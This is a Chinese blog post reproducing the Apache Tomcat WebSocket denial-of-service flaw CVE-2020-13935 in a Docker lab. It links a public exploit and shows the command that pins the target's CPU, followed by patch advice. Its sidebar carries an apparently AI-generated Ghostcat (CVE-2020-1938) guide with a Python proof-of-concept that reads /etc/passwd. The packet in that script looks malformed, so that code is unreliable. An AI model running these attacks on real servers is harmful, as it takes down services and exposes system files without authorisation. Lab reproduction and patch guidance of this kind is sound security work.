Apache Tomcat 安全漏洞(CVE-2020-13935)复现

已于 2022-01-21 10:22:29 修改
阅读量1.7w 收藏 10
点赞数 3
CC 4.0 BY-SA版权
文章标签: apache tomcat 安全
于 2022-01-20 13:57:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40640917/article/details/122599237
本文分析了Apache Tomcat中WebSocket存在的安全漏洞,该漏洞源于程序未能正确验证payload长度,可能导致拒绝服务(无限循环)。介绍了如何验证受影响版本及复现漏洞的过程,并提供了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞详情:

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。

Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。

影响版本:

10.0.0-M1版本至10.0.0-M6版本

9.0.0.M1版本至9.0.36版本

8.5.0版本至8.5.56版本

7.0.27版本至7.0.104版本

漏洞判定:

一、是否是受影响版本。

二、echo.xhtml是否存在。

http://IP:端口/examples/websocket/echo.xhtml

漏洞验证:

一、环境搭建

靶机参数:Centos8.1

靶机配置:Docker

应用容器:Tomcat-9.0.16

靶机Docker中部署Tomcat-9.0.16,并将Tomcat的8080端口绑定到本机的8001端口上:

docker run -it --name chendd-demo-tomcat -p 8001:8080 tomcat:9.0.16-jre8-alpine

运行结果 :

 结果验证:

 

二、漏洞复现

攻击机下载EXP:https://github.com/RedTeamPentesting/CVE-2020-13935

攻击机编译文件:go build(需要Go语言支持)

 

 查看受攻击前靶机的CPU使用率:

开始攻击: 

.\tcdos.exe ws://192.168.127.132:8001/examples/websocket/echoStreamAnnotation

攻击结果:CPU已全部跑满

漏洞修复及建议

一、修复方式: 升级补丁

二、修复建议:

升级到 Apache Tomcat 10.0.0-M7 或更高版本 

升级到 Apache Tomcat 9.0.37 或更高版本 

升级到 Apache Tomcat 8.5.57 或更高版本

漏洞修复:Apache Tomcat 安全漏洞(CVE-2024-50379) | Apache Tomcat 安全漏洞(CVE-2024-52318)
专注于计算机研发知识和资讯分享
01-23 1971
解决方案:升级到最新版Tomcat
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 7333
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
【漏洞复现Apache Tomcat WebSocket 拒绝服务漏洞(CVE-2020-13935
网络安全从业者的学习笔记
01-13 1947
Tomcat 未针对 WebSokcet 进行包长度校验,特制的 WebSocket请求包将导致处理函数无限循环,最终导致服务停机并拒绝服务。查看http://IP:8080/examples/websocket/echo.xhtml 是否可以访问,如果不可以访问,则说明该文件被删掉了,那就无法进行漏洞利用了。
漏洞预警:Apache Tomcat 远程代码执行高危漏洞【CVE-2025-24813】安全预警
最新发布
weixin_47946540的博客
05-15 414
Apache Tomcat 是美国阿帕奇(Apache)基金会一款广泛使用的轻量级 Web 应用服务器,主要用于实现对 Servlet 和 JavaServer Page(JSP)的支持。此次漏洞的产生源于 Apache Tomcat 反序列化机制未对用户输入进行严格验证,导致攻击者能够通过构造恶意序列化对象绕过安全限制,进而实现远程恶意代码的执行,最终获取服务器的控制权。漏洞编号:【CVE-2025-24813】。
CVE-2020-13935Apache Tomcat拒绝服务漏洞复现
weixin_38896449的博客
12-02 8918
CVE-2020-13935-Apache Tomcat拒绝服务漏洞1.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 CVE-2020-13935,WebSocket拒绝服务漏洞,漏洞等级为重要。 Apache Tomcat WebSocket帧中的有效负载长度未正确验证,无效的有效载荷长度可能会触发无限循环,多有效负载长度无效的请求可能会导致拒绝服务。 2.影响版本 Apache Tomcat 10.0.0-M1-10.0.0-M6 Apache Tomcat 9.0.0.M1-9.0.36
Apache Tomcat 安全漏洞(CVE-2020-13935)发现与分析(无POC)
weixin_58666006的博客
02-06 563
10.0.0-M1版本至10.0.0-M6版本9.0.0.M1版本至9.0.36版本8.5.0版本至8.5.56版本7.0.27版本至7.0.104版本。
CVE-2020-13935Tomcat拒绝服务漏洞复现
Delphinidae
11-10 2705
一、靶机复现环境: 用docker安装好的tomcat环境,本次选取的是漏洞验证环境vulhub,github地址是https://github.com/vulhub/vulhub的tomcat/CVE-2020-1938这个漏洞版本,这个版本也存在cve-2020-13935的漏洞 /tools/vulhub/tomcat/CVE-2020-1938 docker-compose up -d #启动漏洞靶机 测试启动是否成功 docker ps ,通过浏览器访问 二、测试POC https:
CVE-2020-13935
龙卷风摧毁停车场
02-28 1145
Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
CVE-2020-13935-master(包含已编译文件tcdos.exe)
01-20
Apache Tomcat 安全漏洞(CVE-2020-13935)验证POC
CVECVE-2020-13935Tomcat 拒绝服务漏洞
边扯边淡
11-13 9889
起序:第一次复现漏洞,有点小激动。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 tomcat 中的 CVE-2020-1938 是 Apache Tomcat/9.0.30 版本,这个版本也存在 CVE-2020-13935 漏洞。 vulhub:https://github.com/vulhub/vulhub 如果有需要,可以参考我做的搭建教程。有截图的。 【靶场】Ubuntu 16.04 搭建 vulhub 靶场环境 1、漏洞:拒绝服务漏洞 Tomcat
Apache Tomcat拒绝服务漏洞(CVE-2020-13935)
m0_65150886的博客
01-02 1249
7月16日, Apache基金会发布公告称,Tomcat中间件存在两个拒绝服务漏洞(CVE-2020-13934/13935)。据了解,上述漏洞是Tomcat中间件存在设计缺陷所导致:一是当请求数过多时会发生内存不足异常(OutOfMemoryException),从而导致拒绝服务;二是WebSocket中对载荷长度的验证存在缺陷,无效的载荷长度可能会触发无限循环,从而导致拒绝服务。go build //编译go程序,输出tcdos.exe。5.Cpu占用率过高,页面无法正常访问。//修改proxy地址。
websocket 拒绝握手_Tomcat WebSocket拒绝服务漏洞(CVE202013935
weixin_35772916的博客
01-13 1022
PART.0101左中括号一、基本信息左中括号1. 基本概要发布时间:2020.07.14漏洞名称:Apache Tomcat WebSocket拒绝服务漏洞威胁类型:拒绝服务攻击CVE编号:CVE-2020-13935影响版本:●Apache Tomcat 10.0.0-M1至10.0.0-M6●Apache Tomcat 9.0.0.M1至9.0.36●Apache Tomcat 8...
[EXP公开] CVE-2020-13935: Tomcat WebSocket 拒绝服务漏洞通告
爱国小白帽
11-06 4151
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110601 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-06 0x01 漏洞简述 2020年11月06日,360CERT监测发现@RedTeamPentesting发布了Tomcat WebSokcet 拒绝服务漏洞 的分析报告,该漏洞编号为 CVE-2020-13935 ,漏洞等级:高危 ,漏洞评分:7.5 。 未授权的远程攻击者通过发送 大量特制
Tomcat WebSokcet 拒绝服务(CVE-2020-13935
swordheart的博客
08-15 718
Tomcat 未针对 WebSokcet 进行包长度校验,特制的 WebSocket 请求包将导致处理函数无限循环,最终导致服务停机并拒绝服务。升级到 Apache Tomcat 10.0.0-M7 或更高版本。升级到 Apache Tomcat 9.0.37 或更高版本。升级到 Apache Tomcat 8.5.57 或更高版本。10.0.0-M1版本至10.0.0-M6版本。9.0.0.M1版本至9.0.36版本。7.0.27版本至7.0.104版本。8.5.0版本至8.5.56版本。...
oracle %3clist%3e一对多,Apache Tomcat httpoxy 安全漏洞
weixin_35763787的博客
04-07 392
来源:CONFIRM链接:http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html来源:CONFIRM链接:https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbh...
【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告
热门推荐
爱国小白帽
02-21 1万+
【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告 原创 绿盟安全服务部 绿盟科技安全情报 昨天 通告编号:NS-2020-0009 2020-02-20 TAG: Apache Tomcat、文件包含、CVE-2020-1938 漏洞危害: 攻击者利用此漏洞,可未授权读取任意文件。* 版本: 1.0 1 漏洞概述 2月20日,国家信...
tomcat-ajp-cve-2020-1938 漏洞复现
04-05
### Tomcat AJP CVE-2020-1938 漏洞复现方法与攻击原理 #### 背景介绍 Tomcat AJP 协议中的文件包含漏洞(CVE-2020-1938)允许攻击者通过构造恶意请求来读取服务器上的任意文件。此漏洞源于 AJP 协议处理不当,可能导致敏感数据泄露甚至远程代码执行。 --- #### 攻击原理 AJP 是一种二进制通信协议,用于在 Web 服务器(如 Apache HTTP Server)和应用服务器(如 Tomcat)之间传输数据。当启用 AJP 连接器时,如果未正确配置权限控制,则可能被滥用以访问受保护资源。具体来说,攻击者可以通过发送特殊格式的 AJP 请求到默认端口 `8009` 来触发漏洞[^2]。 --- #### 环境搭建 为了重现该漏洞,可以使用 Docker 镜像快速部署易受影响版本的 Tomcat 实例: ```bash docker pull duonghuuphuc/tomcat-8.5.32 docker run -d --name vulnerable-tomcat -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32 ``` 上述命令会启动一个带有已知漏洞的 Tomcat 容器实例,并映射必要的端口以便测试[^3]。 --- #### 利用工具准备 目前有多个开源项目可用于检测和利用此漏洞,以下是常用的两种方式: 1. **Ghostcat 工具** Ghostcat 提供了一个简单的界面来进行漏洞扫描和验证。可以从其官方仓库下载并运行: ```bash git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git cd Ghostcat-CNVD-2020-10487 python ghostcat.py http://<target-ip>:8009/ ``` 如果目标主机存在漏洞,工具将返回指定路径的内容[^4]。 2. **自定义 Python 脚本** 下面是一个基于 CNVD 的 PoC 脚本示例,可以直接修改后使用: ```python import socket def send_ajp_request(ip, port=8009, filename="/etc/passwd"): packet = b'\x12\x34\x00\x02\xfd\x00\x00\x00\x00\x00\xbb\x02\x4e' \ b'\x00\x00\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ f'{filename}'.encode() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((ip, port)) sock.send(packet) response = sock.recv(1024).decode('utf-8', errors='ignore') if 'root:' in response: print("[+] Vulnerable! File content:") print(response.strip()) else: print("[-] Not vulnerable or file not found.") except Exception as e: print(f"[!] Error occurred: {str(e)}") finally: sock.close() if __name__ == "__main__": target_ip = input("Enter the IP address of the target server: ") send_ajp_request(target_ip) ``` 此脚本尝试连接至目标机器的 AJP 端口,并请求 `/etc/passwd` 文件内容作为演示[^1]。 --- #### 结果分析 一旦成功获取预期文件内容(例如 Linux 系统用户的密码列表),即可确认目标系统受到 CVE-2020-1938 影响。需要注意的是,在实际渗透测试过程中应严格遵循法律规范,仅针对授权范围内的资产操作。 --- #### 补救措施 为了避免此类风险,建议采取以下防护手段之一或组合实施: - 关闭不必要的 AJP 功能; - 使用防火墙限制对 AJP 端口的外部访问; - 更新至最新稳定版 Tomcat 并重新评估安全性设置。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

幻梦聚沫散

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值